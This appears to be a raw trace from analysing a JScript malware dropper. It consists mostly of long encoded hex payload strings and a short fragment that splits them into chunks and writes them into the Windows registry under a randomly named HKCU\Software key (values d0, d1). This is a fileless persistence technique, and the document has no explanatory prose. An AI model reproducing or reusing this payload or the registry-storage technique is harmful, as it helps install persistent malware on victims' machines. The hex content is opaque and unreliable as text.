"F151C2D011D03120EF61C011D0F0F1C031A000002FF60700E1EA27A9B0115011D0E0F12AA000109782A9B0115011B0115011D0D0F10000008A83B03161A031AD7196E85011D0C0F15031A000004FF6D9C2F16152100000C9D871A000003FF66D71A000002FF6070045592740000088B7200000F1F84011400000B7B72040000088B7200000F1F84011400000B7B720D0B0F10000108383A061D0A0F1A0C29011903110EF514011D090F1BB136011701170316D717011D0E1000001B240317011D0B190C28011803110EF61A0001087F6A0000026F630A0000026F640000058B7200000F1F87011400000B7B720D0A1F3B2703161603196E8400000B7B720D091403151D081B0EFF100A000003582000011000095000020F7005003B1000090E3000000C000009025000090D300000010000000100000C114A26000A00000358260C280A7A00000858208A00033026CEDA000004382100000544711EFF510EF6180F530EF617030EF41100000545702EDFFFFEF8A0000000000000020547010B2713003EFF170C090A3EDFFFFEFDBFFFFEF6BFFFFEF5BFFFFEF96FFFFEFA5FFFFEFF1FFFFDFCEFFFFDF0EFFFFDF9AFFFFDF19FFFFDFB8FFFFDF97FFFFDF76FFFFDFF4FFFFDFE4FFFFCF5FFFFFCF1FFFFFCF0FFFFFCF29FFFFCFE8FFFFCFD8FFFFCFF2FFFFCFC0FFFFCF60FFFFBF8AFFFFBF58FFFFBFF7FFFFBF12FFFFBF00FFFFAFDDFFFFAFEBFFFFAFBAFFFFAF5AFFFFAF08FFFFAFD6FFFFAF46FFFFAF35FFFFAF25FFFFAFA2FFFFAF62FFFFAF52FFFF9F1FFFFF9FDEFFFF9F9BFFFF9FC9FFFF9FD7FFFF9F26FFFF9F55FFFF9FC4FFFF9F23FFFFAFE6FFFF9FD2FFFF9F72FFFF9F00FFFF8F0FFFFF8F9EFFFF8FBDFFFF8F8AFFFF8FA5FFFF8F12FFFF8F11FFFF8F30FFFF7FAFFFFF7FBDFFFF7FAAFFFF7FB9FFFF7FA9FFFF7F88FFFF7F48FFFF7F95FFFF7FD4FFFF7FC3FFFF7F73FFFF7F10FFFF6F9EFFFF6F0E00000000000000D454C06185718000001058DD00B2A071D0B4F100626000109182A000102782A000105782A00010073740000097B720A00010D682A00010C6E7A0001086376000107182A1A00010B682A00010A682A000109637A6E1A000108637302020D094F138132211321132316D713211D084F1626000109182A000102782A000105782A00010073740000097B720A00010D682A00010C6E7A0001086376000107182A1487DE61211302020D074F1123178600010718281A00010B682A00010A682A0001007378D813211A00010A682A000109637A6C0F1A0001086373020D064F177B232316122310211D054F10231A00010E682A00010D682A00010C6E7A000108637600010718281A00010B682A00010A682A000109637A691A0001086373020D044F1000010D093F111F13110EFB119483040000087B720D034F1000010528300FFFFAFF1E3A011B011B0316D71B011D014F1FFFFDF54E38111911191316D719111D004F131317B6D400000F7B7200000D1F891110111A63111D0F3F1002AA00010778260001071827B400000F7B7200000D1F891110111A00010B682A00010A682A0001007373111A00010A682A000109637F011A000108637701120911140000028B7200000E1F86DB0116011400000D7B720D0D3F100B5B200002AA0001037F67B400000F7B7200000D1F891110111A00010B682A00010A682A0001007373111A00010A682A000109637F011A000108637701140000087B720A00000BE82911140000028B7200000E1F86DB0116011400000D7B720D0A3F10006B200002AA0001037F67B400000F7B7200000D1F891110111A00010B682A00010A682A0001007373111A00010A682A000109637F011A000108637701140000087B720A000104782911140000028B7200000E1F86DB0116011400000D7B720D073F1F5C2E111E13110EF61A000101782A000109637A691A000108637400000A7B720D063F10000002883002AA0001037F67B400000F7B7200000D1F891110111A00010B682A00010A682A0001007373111A00010A682A000109637F011A000108637701140000087B720A000002B82911140000028B7200000E1F86DB0116011400000D7B720D043F146C2D111D13110EF61A000101782A000109637A681A000108637400000A7B720D033F10000109083002AA0001037F67B400000F7B7200000D1F891110111A00010B682A00010A682A0001007373111A00010A682A000109637F011A000108637701140000087B720A00000BE82911140000028B7200000E1F86DB0116011400000D7B720D013F146C2C111C13110EF61A000101782A00010C6E7A000108637400000A7B720D003F10000101993B111B13110EF61600010618240000008B7200000D1F89111011120D0F2F10000207193A111A13120EFA690F140000008B7200000D1F891110111D0E2F10000202B839131618131AD7196E80111D0D2F1313161D0C2F140000028D710000004D86D71AD7196E80111200000E1F86DB0116011400000D7B720D0B2F1FFFFEF2BA37111713140EFF0111111D0A1F10021316D712111D092F111316DA6716DA6ADC011E0111111D082F100400000F7D7E6197B40000008B7200000D1F821110111400000C7B720200000D1F821110111D062F100A2B20000400000F7D79BA000007982B5040000000000000032C6ADA6C0F140000008B7200000D1F821110111200000D1F821110111D032F10063B200400000F7D79BA000007982B5040000000000000032C6ADA6D0F140000008B7200000D1F821110111200000D1F821110111D012F173C261116131600010618240000008B7200000D1F82111011120D002F1000000D8935111513120EFA690F140000008"
                                                                  • "F151C2D011D03120EF61C011D0F0F1C031A000002FF60700E1EA27A9B0115011D0E0F12AA000109782A9B0115011B0115011D0D0F10000008A83B03161A031AD7196E85011D0C0F15031A000004FF6D9C2F16152100000C9D871A000003FF66D71A000002FF6070045592740000088B7200000F1F84011400000B7B72040000088B7200000F1F84011400000B7B720D0B0F10000108383A061D0A0F1A0C29011903110EF514011D090F1BB136011701170316D717011D0E1000001B240317011D0B190C28011803110EF61A0001087F6A0000026F630A0000026F640000058B7200000F1F87011400000B7B720D0A1F3B2703161603196E8400000B7B720D091403151D081B0EFF100A000003582000011000095000020F7005003B1000090E3000000C000009025000090D300000010000000100000C114A26000A00000358260C280A7A00000858208A00033026CEDA000004382100000544711EFF510EF6180F530EF617030EF41100000545702EDFFFFEF8A0000000000000020547010B2713003EFF170C090A3EDFFFFEFDBFFFFEF6BFFFFEF5BFFFFEF96FFFFEFA5FFFFEFF1FFFFDFCEFFFFDF0EFFFFDF9AFFFFDF19FFFFDFB8FFFFDF97FFFFDF76FFFFDFF4FFFFDFE4FFFFCF5FFFFFCF1FFFFFCF0FFFFFCF29FFFFCFE8FFFFCFD8FFFFCFF2FFFFCFC0FFFFCF60FFFFBF8AFFFFBF58FFFFBFF7FFFFBF12FFFFBF00FFFFAFDDFFFFAFEBFFFFAFBAFFFFAF5AFFFFAF08FFFFAFD6FFFFAF46FFFFAF35FFFFAF25FFFFAFA2FFFFAF62FFFFAF52FFFF9F1FFFFF9FDEFFFF9F9BFFFF9FC9FFFF9FD7FFFF9F26FFFF9F55FFFF9FC4FFFF9F23FFFFAFE6FFFF9FD2FFFF9F72FFFF9F00FFFF8F0FFFFF8F9EFFFF8FBDFFFF8F8AFFFF8FA5FFFF8F12FFFF8F11FFFF8F30FFFF7FAFFFFF7FBDFFFF7FAAFFFF7FB9FFFF7FA9FFFF7F88FFFF7F48FFFF7F95FFFF7FD4FFFF7FC3FFFF7F73FFFF7F10FFFF6F9EFFFF6F0E00000000000000D454C06185718000001058DD00B2A071D0B4F100626000109182A000102782A000105782A00010073740000097B720A00010D682A00010C6E7A0001086376000107182A1A00010B682A00010A682A000109637A6E1A000108637302020D094F138132211321132316D713211D084F1626000109182A000102782A000105782A00010073740000097B720A00010D682A00010C6E7A0001086376000107182A1487DE61211302020D074F1123178600010718281A00010B682A00010A682A0001007378D813211A00010A682A000109637A6C0F1A0001086373020D064F177B232316122310211D054F10231A00010E682A00010D682A00010C6E7A000108637600010718281A00010B682A00010A682A000109637A691A0001086373020D044F1000010D093F111F13110EFB119483040000087B720D034F1000010528300FFFFAFF1E3A011B011B0316D71B011D014F1FFFFDF54E38111911191316D719111D004F131317B6D400000F7B7200000D1F891110111A63111D0F3F1002AA00010778260001071827B400000F7B7200000D1F891110111A00010B682A00010A682A0001007373111A00010A682A000109637F011A000108637701120911140000028B7200000E1F86DB0116011400000D7B720D0D3F100B5B200002AA0001037F67B400000F7B7200000D1F891110111A00010B682A00010A682A0001007373111A00010A682A000109637F011A000108637701140000087B720A00000BE82911140000028B7200000E1F86DB0116011400000D7B720D0A3F10006B200002AA0001037F67B400000F7B7200000D1F891110111A00010B682A00010A682A0001007373111A00010A682A000109637F011A000108637701140000087B720A000104782911140000028B7200000E1F86DB0116011400000D7B720D073F1F5C2E111E13110EF61A000101782A000109637A691A000108637400000A7B720D063F10000002883002AA0001037F67B400000F7B7200000D1F891110111A00010B682A00010A682A0001007373111A00010A682A000109637F011A000108637701140000087B720A000002B82911140000028B7200000E1F86DB0116011400000D7B720D043F146C2D111D13110EF61A000101782A000109637A681A000108637400000A7B720D033F10000109083002AA0001037F67B400000F7B7200000D1F891110111A00010B682A00010A682A0001007373111A00010A682A000109637F011A000108637701140000087B720A00000BE82911140000028B7200000E1F86DB0116011400000D7B720D013F146C2C111C13110EF61A000101782A00010C6E7A000108637400000A7B720D003F10000101993B111B13110EF61600010618240000008B7200000D1F89111011120D0F2F10000207193A111A13120EFA690F140000008B7200000D1F891110111D0E2F10000202B839131618131AD7196E80111D0D2F1313161D0C2F140000028D710000004D86D71AD7196E80111200000E1F86DB0116011400000D7B720D0B2F1FFFFEF2BA37111713140EFF0111111D0A1F10021316D712111D092F111316DA6716DA6ADC011E0111111D082F100400000F7D7E6197B40000008B7200000D1F821110111400000C7B720200000D1F821110111D062F100A2B20000400000F7D79BA000007982B5040000000000000032C6ADA6C0F140000008B7200000D1F821110111200000D1F821110111D032F10063B200400000F7D79BA000007982B5040000000000000032C6ADA6D0F140000008B7200000D1F821110111200000D1F821110111D012F173C261116131600010618240000008B7200000D1F82111011120D002F1000000D8935111513120EFA690F140000008".substr(19000) ➔ "615210000030D8710700A47E2741A00000B38280C0600010F137600000303B9370B0A00000B5826000A0A0000094820700F47E27A00010D182C1F100110000B40000309E008003B110000054000000010000303C0000300B00000031000000000000C114000000A20000EDA000003582009331A0000043825201ED0000FFFFCF5DE36011701170316D7170110000400000B008A0000094828311400000B0E78331A00000B7822A0700D48A27C1522A2311B1522A0700D4C727A1522AA11191522A0700D4262781522A111171522A0700F4B627615210000004D8D1E4C273117331F530EF61A000006582610700103327231130EF61A000006582610700103327A11123316000005F82B10000B0471311000000A000109482617141412AA00000B382A961C21181522A721171522A100000E4C87011615210000030D8910700B4122741A00000B382121193C263116331196103111331A00000B382A000007B820311F211E211D211D111C111A00000B382B1110331C971615210000008D871F23141E23141D231C211C231E1112AA00000B382A00000B382B2110211F11100007031A000107482A000108482A00000D282100000E40DA00000B382A00000B382A961511152C2531153311961F011B231A00000B382A000007B82F011A2119211821142113211A00000B3822211F031C971615210000008D881A23141923141823151115131B0112A72116211521172310700F4F5276231715231B0112A100000E4C8701161B011B03110000030D88142310700B412273231412231A00000B38212111231A00000B38280023161F131E111E13110000030D871D1310700823327C13141B131A00000BE82A131A00000C482A00000B382911100007031A000107482A000108482A00000D282100000E40DA00000B382A00000B382A961511152C2431143311961F0119131A00000B382A000007B82F01181117111611141113111A00000B3822111F031C971615210000008D8818131417131416131511151312A0700F4552771522A100000E4C87011615210000030D88141310700B412273131412131A00000B382801131A00000C482A00000B382011100007031A000107482A000108482A00000D282100000E40DA00000B382A00000B382A961B01152C2331133311961F0110131A00000B382A000007B82F011E011D011C011A0119011A00000B3828011F031C971615210000008D881E03141D03141C031B011B0312A0700F4B42771522A100000E4C87011615210000030D881A0310700B412279031418031A00000B38280000030228370315011603140115031904031A000107482A00000B382A000106482100000E4C871A00000B382A000007B8241414110000030D8610700B4902741A00000B38280D06162A00000AA82714141412A0700F4B327615210000030D8710700A47E2741A00000B38280C0600010F13760000030F99370B0A00000B5826000A0A0000094820700E43E27A00010D182C1F100110000B40000305D008003B110000054011060DD00920000000001100000A200000000EDA00000358200C031A0000043825201EDFFFFFF27E39011A011A0316D71A011400000B008A00000C482A00000B382A00000A482A00000B382B011400000B0E7B031A00000B7822A0700D48A27C1522AA0001045F6A0001035F6A0115011B1522A0700D4C727A1522AA0001045F6A0001035F6A011401191522A0700D4262781522AA0001045F6A0001035F6A0119071522A0700E4E527615210000004D8D10000005883A031801190317011803160117031AD71A0001025F6906031615031A00000BAF60700E4C427604031A00000BAF60700E4242760D0A00000BAF60700E403276000A0001015F6706000000000FE9380C0A00000B58270B0A0000094820700E44027A0001004820700D44F27A0A000009A3700110000A4000010A1005003B100003084000000C0000030C50000307400000010000000100000C114000000A200A00000358260C270A7A00000858208A00033026CEDA000004382100000544711EFF510EF6170F530EF616030EF41100000545702EDFFFFFF840000000000000020546010B2713003EFF160B080A3EDFFFFFFD5FFFFFFB5FFFFFF74FFFFEF0FFFFFEFFDFFFFEFECFFFFEF8CFFFFEFFAFFFFEFF9FFFFEF39FFFFEF77FFFFEFE5FFFFEFE4FFFFEF24FFFFEF62FFFFEFD0FFFFDFDFFFFFDF1FFFFFDF5DFFFFDFCBFFFFDFCAFFFFDF0AFFFFDF48FFFFDFA7FFFFDF07FFFFDF66FFFFDFC5FFFFDFB4FFFFDFB3FFFFDFB2FFFFDFB1FFFFDF01FFFFDF70FFFFCF6FFFFFCFFDFFFFCF6D000000000000005254B0618571700000005EDD0000400000B008A000009482E011400000B0E7C022F1E031A000009482A00000B7822A0700D48A27E1522AD011D1522A0700D46927C1522AA011B1522A0700D4C727A1522AB01191522A0700D4262781522AC01171522A0700D44527615210000004D890F10700C4ED27C012F1A031A00000A7F6F011A00000A882C002F1F031A000003982A0000058F6A011C0F1F1E03141C0E1F100A0000010F610000051579111D0C210000051579111C0D1F16DD2B111B131A00000FAF69111C0C1F1D031A00000EAF6A111C0B1F1A131100000F747A00000DAF69111D1B29131A00000CAF69011C0A1F100A0000010F610000051576111D0C210000051576111C091F16DD281118131A00000FAF66111C081F1A031A00000EAF67111C071F17131100000F747A00000DAF66111D1B26131A00000CAF68011C061F100A0000010F610000051573111D0C210000051573111C051F16DD251115131A00000FAF63111C041F1B031A00000EAF64111C031F141"
                                                                  • "615210000030D8710700A47E2741A00000B38280C0600010F137600000303B9370B0A00000B5826000A0A0000094820700F47E27A00010D182C1F100110000B40000309E008003B110000054000000010000303C0000300B00000031000000000000C114000000A20000EDA000003582009331A0000043825201ED0000FFFFCF5DE36011701170316D7170110000400000B008A0000094828311400000B0E78331A00000B7822A0700D48A27C1522A2311B1522A0700D4C727A1522AA11191522A0700D4262781522A111171522A0700F4B627615210000004D8D1E4C273117331F530EF61A000006582610700103327231130EF61A000006582610700103327A11123316000005F82B10000B0471311000000A000109482617141412AA00000B382A961C21181522A721171522A100000E4C87011615210000030D8910700B4122741A00000B382121193C263116331196103111331A00000B382A000007B820311F211E211D211D111C111A00000B382B1110331C971615210000008D871F23141E23141D231C211C231E1112AA00000B382A00000B382B2110211F11100007031A000107482A000108482A00000D282100000E40DA00000B382A00000B382A961511152C2531153311961F011B231A00000B382A000007B82F011A2119211821142113211A00000B3822211F031C971615210000008D881A23141923141823151115131B0112A72116211521172310700F4F5276231715231B0112A100000E4C8701161B011B03110000030D88142310700B412273231412231A00000B38212111231A00000B38280023161F131E111E13110000030D871D1310700823327C13141B131A00000BE82A131A00000C482A00000B382911100007031A000107482A000108482A00000D282100000E40DA00000B382A00000B382A961511152C2431143311961F0119131A00000B382A000007B82F01181117111611141113111A00000B3822111F031C971615210000008D8818131417131416131511151312A0700F4552771522A100000E4C87011615210000030D88141310700B412273131412131A00000B382801131A00000C482A00000B382011100007031A000107482A000108482A00000D282100000E40DA00000B382A00000B382A961B01152C2331133311961F0110131A00000B382A000007B82F011E011D011C011A0119011A00000B3828011F031C971615210000008D881E03141D03141C031B011B0312A0700F4B42771522A100000E4C87011615210000030D881A0310700B412279031418031A00000B38280000030228370315011603140115031904031A000107482A00000B382A000106482100000E4C871A00000B382A000007B8241414110000030D8610700B4902741A00000B38280D06162A00000AA82714141412A0700F4B327615210000030D8710700A47E2741A00000B38280C0600010F13760000030F99370B0A00000B5826000A0A0000094820700E43E27A00010D182C1F100110000B40000305D008003B110000054011060DD00920000000001100000A200000000EDA00000358200C031A0000043825201EDFFFFFF27E39011A011A0316D71A011400000B008A00000C482A00000B382A00000A482A00000B382B011400000B0E7B031A00000B7822A0700D48A27C1522AA0001045F6A0001035F6A0115011B1522A0700D4C727A1522AA0001045F6A0001035F6A011401191522A0700D4262781522AA0001045F6A0001035F6A0119071522A0700E4E527615210000004D8D10000005883A031801190317011803160117031AD71A0001025F6906031615031A00000BAF60700E4C427604031A00000BAF60700E4242760D0A00000BAF60700E403276000A0001015F6706000000000FE9380C0A00000B58270B0A0000094820700E44027A0001004820700D44F27A0A000009A3700110000A4000010A1005003B100003084000000C0000030C50000307400000010000000100000C114000000A200A00000358260C270A7A00000858208A00033026CEDA000004382100000544711EFF510EF6170F530EF616030EF41100000545702EDFFFFFF840000000000000020546010B2713003EFF160B080A3EDFFFFFFD5FFFFFFB5FFFFFF74FFFFEF0FFFFFEFFDFFFFEFECFFFFEF8CFFFFEFFAFFFFEFF9FFFFEF39FFFFEF77FFFFEFE5FFFFEFE4FFFFEF24FFFFEF62FFFFEFD0FFFFDFDFFFFFDF1FFFFFDF5DFFFFDFCBFFFFDFCAFFFFDF0AFFFFDF48FFFFDFA7FFFFDF07FFFFDF66FFFFDFC5FFFFDFB4FFFFDFB3FFFFDFB2FFFFDFB1FFFFDF01FFFFDF70FFFFCF6FFFFFCFFDFFFFCF6D000000000000005254B0618571700000005EDD0000400000B008A000009482E011400000B0E7C022F1E031A000009482A00000B7822A0700D48A27E1522AD011D1522A0700D46927C1522AA011B1522A0700D4C727A1522AB01191522A0700D4262781522AC01171522A0700D44527615210000004D890F10700C4ED27C012F1A031A00000A7F6F011A00000A882C002F1F031A000003982A0000058F6A011C0F1F1E03141C0E1F100A0000010F610000051579111D0C210000051579111C0D1F16DD2B111B131A00000FAF69111C0C1F1D031A00000EAF6A111C0B1F1A131100000F747A00000DAF69111D1B29131A00000CAF69011C0A1F100A0000010F610000051576111D0C210000051576111C091F16DD281118131A00000FAF66111C081F1A031A00000EAF67111C071F17131100000F747A00000DAF66111D1B26131A00000CAF68011C061F100A0000010F610000051573111D0C210000051573111C051F16DD251115131A00000FAF63111C041F1B031A00000EAF64111C031F141".substr(19000) ➔ "825201ED0000FFFFEF0EE36011701170316D7170110000400000B008A000009482D011400000B0E7D031A00000B7822A0700429527C1522A5011B1522A0700427427A1522A401191522A0700B21D2781522A9071522A070004A727615210000004D8D1D4C2C011C031F530EF61A000006582610700103327501130EF61A00000658261070010332740110050316000005F82A0000087F6600010D1F60700B29327701180A00000BE820002B20000005031600000CC829011A0000087F65011A00000BE8261C2B011B03110EF61A011A03110EF4190119031600000BC82A000000FF6A00010F3F6A00010E3826034C280118031600000AC8250115031600010D1F60700B293277011804031600010D1F60700B2B127701180D0600010D1F60700B2502770118000001071837031616031AD71600010B1F68062600010A1F60700A27F2780C0600010F13760000010649370B0A00000B5826000A0A0000094820700048127A00010D182C1F10011000034000010C7004003B11000005400000001000010A60000107500000031000000000000C114A20000EDA00000358200E031A0000043825201ED0000FFFFEF0EE36011701170316D7170110000400000B008A000009482D011400000B0E7D031A00000B7822A0700429527C1522A5011B1522A0700427427A1522A401191522A0700B21D2781522A9071522A0700F35927615210000004D8D1D4C2C011C031F530EF61A000006582610700103327501130EF61A00000658261070010332740110050316000005F82A0000087F6600010D1F60700B29327701180A00000BE820002B20000005031600000CC829011A0000087F65011A00000BE8261C2B011B03110EF61A011A03110EF4190119031600000BC82A000000FF6A00010F3F6A00010E3826034C280118031600000AC8250115031600010D1F60700B293277011804031600010D1F60700B2B127701180D0600010D1F60700B2502770118000001071837031616031AD71600010B1F68062600010A1F60700A27F2780C0600010F13760000010649370B0A00000B5826000A0A0000094820700F35427A00010D182C1F10011000034000010C7004003B11000005400000001000010A60000107500000031000000000000C114A20000EDA00000358200E031A0000043825201ED0000FFFFEF0EE36011701170316D7170110000400000B008A000009482D011400000B0E7D031A00000B7822A0700429527C1522A5011B1522A0700427427A1522A401191522A0700B21D2781522A9071522A0700E39C27615210000004D8D1D4C2C011C031F530EF61A000006582610700103327501130EF61A00000658261070010332740110050316000005F82A0000087F6600010D1F60700B29327701180A00000BE820002B20000005031600000CC829011A0000087F65011A00000BE8261C2B011B03110EF61A011A03110EF4190119031600000BC82A000000FF6A00010F3F6A00010E3826034C280118031600000AC8250115031600010D1F60700B293277011804031600010D1F60700B2B127701180D0600010D1F60700B2502770118000001071837031616031AD71600010B1F68062600010A1F60700A27F2780C0600010F13760000010649370B0A00000B5826000A0A0000094820700E3F727A00010D182C1F10011000034000010C7004003B11000005400000001000010A60000107500000031000000000000C114A20000EDA00000358200E031A0000043825201ED0000FFFFEF0EE36011701170316D7170110000400000B008A000009482D011400000B0E7D031A00000B7822A0700429527C1522A5011B1522A0700427427A1522A401191522A0700B21D2781522A9071522A0700E35027615210000004D8D1D4C2C011C031F530EF61A000006582610700103327501130EF61A00000658261070010332740110050316000005F82A0000087F6600010D1F60700B29327701180A00000BE820002B20000005031600000CC829011A0000087F65011A00000BE8261C2B011B03110EF61A011A03110EF4190119031600000BC82A000000FF6A00010F3F6A00010E3826034C280118031600000AC8250115031600010D1F60700B293277011804031600010D1F60700B2B127701180D0600010D1F60700B2502770118000001071837031616031AD71600010B1F68062600010A1F60700A27F2780C0600010F13760000010649370B0A00000B5826000A0A0000094820700D3DB27A00010D182C1F10011000034000010C7004003B11000005400000001000010A60000107500000031000000000000C114A20000EDA00000358200E031A0000043825201ED0000FFFFEF0EE36011701170316D7170110000400000B008A000009482D011400000B0E7D031A00000B7822A0700429527C1522A5011B1522A0700427427A1522A401191522A0700B21D2781522A9071522A0700D35427615210000004D8D1D4C2C011C031F530EF61A000006582610700103327501130EF61A00000658261070010332740110050316000005F82A0000087F6600010D1F60700B29327701180A00000BE820002B20000005031600000CC829011A0000087F65011A00000BE8261C2B011B03110EF61A011A03110EF4190119031600000BC82A000000FF6A00010F3F6A00010E3826034C280118031600000AC8250115031600010D1F60700B293277011804031600010D1F60700B2B127701180D0600010D1F60700B2502770118000001071837031616031AD71600010B1F68062600010A1F60700A27F2780C0600010F13760000010649370B0A00000B5826000A0A0000094820700C31F27A00010D182C1F10011000034"
                                                                  29
                                                                  }
                                                                    30
                                                                    else
                                                                      31
                                                                      {
                                                                        32
                                                                        chunk = dataString;
                                                                          33
                                                                          dataString = "";
                                                                            34
                                                                            }
                                                                              35
                                                                              shellInstance.RegWrite ( registryPath + directoryName + "\\donn\\d" + index, chunk, "REG_SZ" );
                                                                              • RegWrite("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\donn\d0","000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003306000000C000200100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A0D0E397C626D656373716F2C3A0D0A0D0E3D2D20202A0D0E39736E65646E656075646F2C30202A0D0E397C626D65637371447E65646E656075646F2C302020202A0D0E3F20202020202020202A0D022A222D35676165776E616C602020202020202020202A0D0226646136636364343134363265393536322D3E656B6F6459756B43696C626570702020202020202020202A0D022A222D356275747365647968636271427F637375636F6270702020202020202020202A0D02203E203E203E26322D3E6F6963727566702020202020202020202A0D02237C6F62747E6F634D2E6F6D6D6F634E23777F646E69675E24766F637F6273696D422D356D616E602020202020202020202A0D0222333E6967722D35607974702020202020202020202A0D097479647E656469497C626D656373716C3020202020202A0D0E397C626D65637371447E65646E656075646C302020202A0D0E39736E65646E656075646C30202A0D0D2D212C30202A0D0E3D2D2029227564716C60246E616020585023777F646E6967582023776F6C61696460246E6160237C6F62747E6F63602E6F6D6D6F636023777F646E696750227F666023756D65686470256C62616E65402D2D212C30202A0D0A0D0E3D2D20202A0D0E3E6F69647163696C6070716F2C30202A0D0E33776E696474756353777F646E69677F2C302020202A0D0E35627167714960746F2C356572747E3223776E696474756353777F646E69675F253030323F294D435F2D6F636E24766F637F6273696D6E23716D656863637F2F2A30747478622D337E6C6D687025627167714960746C3020202020202A0D0E33776E696474756353777F646E69677C302020202A0D0E3223367E2D63716A3D6F636D24766F637F6273696D6D23716D656863637A3E6275722D337E6C6D68702E6F69647163696C6070716C30202A0D0D2D212C30202A0D0E3D2D202E2769666E6F636E207071602279656864702E6960272565727477202F6470276E69647475637027276E696A796375625F64757149607448676968437D627F6643777F646E6967556C62616E65472025686470247563702F637C61602020202020202A0D00246C657F6863702C276E69647475637023796864702F647E696024707F602471686470263E24302B627F67756D6162764024554E4E20276E6964756762716470237E6F69647163696C60707160237D627F664023777F646E6967502E2E696024707F602F64702020202020202A0D002465656E60247F6E602F6460246E616025627167716D29405440297C6C61636964716D6F6475716025627160237E6F69647163696C607071602926405758202E6F696471646E657F66402E6F696471647E65637562705023777F646E6967502E23794054402020202020202A0D0275686769686024716023777F646E69675029726024656C61636370297C6C61636964716D6F64757160256260247F6E602C6C696770246E616025627167716D294054402379602E6F69647163696C60707160256864702471686470237564716369646E69402D2D212C30202A0D0A0D0E3974796C6962696471607D6F636F2C30202A0D0E3E6F69647163696C6070716F2C302020202A0D0A0D0","REG_SZ") ➔ undefined
                                                                              • RegWrite("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\donn\d1","76665797653474746495B1001002000000001070001080571110100250103777F6278645E6F696470756368754E6F6E40716277561204500100010E10000000000800010808B081160400B081160404B0811604081811000402000003090201000409081100040800A0811010A081101803002C094210A0811010A081101803002D0C1D421800A0811010A0811019421500201801321818180400280942180100250C1D421801321818194216002C0E0A0100240C1D421E094213002809421A0100250C1D4219421200270800A0811010A081101803000C0E0A01000408120100040A0000030E08100E120100170E08181200050E0811000408110162151606080008230E0D1008240880821D1008260A00082308010100240E0D110100250880821D110100270880821D1000260A010100240A0000230880821D16050E0D1000240E080E02002508080E0200250E020100240B020100240B0101002408080B0200250A0201002408080A02002508080100240E0D160308711D16040C711D16040B06020706020000000204000000010404611603000E100E10100E1201001A0E000003050D150D1C1200070C611018086110181C61101E0C611012070002150D150D1E0200070E050D1100050E020100040E080E020005050D1E010005006211016215100008050D1D150D1100270E08150D1200260810150D18181300280E0E0E081300260818010024050D150D150D150D150D150D15002E0E01010024050D150D150D110300290A0602080E0102002508080018050D18050D1C411018050D18190A000319080018050D18050D1C411018050D18190A000318190100040908050D180818101E08181909000E0808050D1E081905000909080018050D1E081906000B090819020005090E0E081019040008080602050D160300000004040000000804000000000409060209521603004216030942115110180200280C1D421151101808094215002C090E01002401511E01002501511018080803002800321101002508180100040151101808081804000908081C321808140008003216030206020816020C3216030E000823015110082401511000240E0151110200260151160304321C110200260942110100250C1D4214321C194214002A081C110200250D221008040001020E0E0200050E0012010005090909020005050D1201000505110819080132150D19090807000C0808010004080018180200060808001808180400080801321818030007081000030E0101000404321C1102000601421C11020006050D1000040C1000030E0E0E0200050E0E0E010300060E0E0E050D110400080E0E0E0E010400070E0E0102000506110A0E0E0803000609080100040221080E0018080300070E0E0100040E0C1100040D31193215321C1204000A0D22110100050D221000040C160201321603083216030D22160309221D16040E0602042210080404221000040422160301221008040D1210080401221101000501221000040D12100004012216030D12160300031008240003100024000316030E0000230912100024080000230C12010024000E101101010037000E100E110100170512160308121008040412100804011210080408021008040C0210080408121000040412100004011210000408021000040C02100004010000030812110C121516070412110C121516070112110C121516070802110C121516070C02110C121516070980E439165C5A77B8010000230A3A05D11F7F5F30B80004CD9606E8E4C155A8462D4E5BEEE83A7000000004700070097002700360056004400F50025004400350013001300B40005F1000047009600E6009400F50035003500E4110000C600C6004600E200330037003700E600C5310000C600C6004600E20056005700C6007600A700F600D600C5910000C5008700F600260047003700F6000500C5310000C5002700560037007700F60027002400D6009600C6003500C5B10000C5004700E6005600270027005700340002008700F600660027005600470016007500C5520000C500E600F600F600D40002005600C60016000500C5710000C5008700F600660027005600260097003400C5510000C500E600F6007600160027004400560036009400C500F6004600F600D600F6003400C5520000C50097005600B600E600F600D400160056003500C5710000C5008700F6006600560027009600640002001600C600C6009600A700F600D400C5320000C5004600270096002600270056004600E60057008600450002001600C600C6009600A700F600D400C5B2000035005400C40094006400D400140025007400F400250005910000E6007700F60046004700570086003500F50035003500E49110000200A30047003700F6008400A000D000E600F600F600D4005600C600160005000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0F7000037005600C60096006600F60027000500C500E600F600F600D40002005600C60016000500C5003700E600F60096004700360057004600F6002700050002004600C600960086003600E600F600F600D41510000200A30047003700F6008400A000D0008700F600240047003700F60005000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0D7","REG_SZ") ➔ undefined
